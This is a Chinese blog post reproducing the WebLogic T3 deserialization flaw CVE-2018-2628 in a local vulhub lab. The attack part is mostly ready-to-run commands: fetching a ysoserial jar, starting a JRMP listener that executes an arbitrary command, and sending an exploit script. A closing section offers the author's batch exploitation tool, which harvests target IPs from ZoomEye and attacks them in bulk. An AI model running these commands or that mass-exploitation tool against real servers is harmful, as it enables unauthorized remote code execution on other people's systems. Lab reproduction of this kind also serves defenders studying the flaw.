Weblogic deserialization vulnerability recurrence (CVE-2018-2628)
前言
复现CVE-2018-2628的反序列化漏洞,正好还欠慕慕一个对应的利用脚本。随便就一起搞了,搭建这个靶场可真的是耗费时间= =
BGM 方圆几里:
正文
首先去vulhub下好对应的项目,进入对应的文件夹,执行:
docker-compose up -d
搭建好环境后,访问:127.0.0.1:7001
出现以下:
漏洞介绍
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
漏洞复现
下载对应的利用工具:
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
copy里面的利用代码https://www.exploit-db.com/exploits/44553
利用:
启动一个JRMP Server:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
listen port=监听的端口
command=你要执行的命令
例子:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections1 'touch /haq520'
发送exploit
python exp.py 127.0.0.1 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 127.0.0.1 1099 JRMPClient
结果:
实战
上面说了欠慕慕一个脚本,这里下午写完。放入了仓库
python/weblogic反序列化批量利用 at master · 422926799/python · GitHub
说明:
weblogic反序列化批量利用,可通过网页关键字判断是否weblogic服务,批量检测或单个检测,判断7001端口是否开放,可从zoomeye抓取IP,请自行配置config文件夹里面的search.ini,填写zoomeye的user和pwd。
测试结果:
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:Weblogic deserialization vulnerability recurrence (CVE-2018-2628)
本文作者:九世
发布时间:2019-02-16, 16:38:27
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/5a7054a8.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。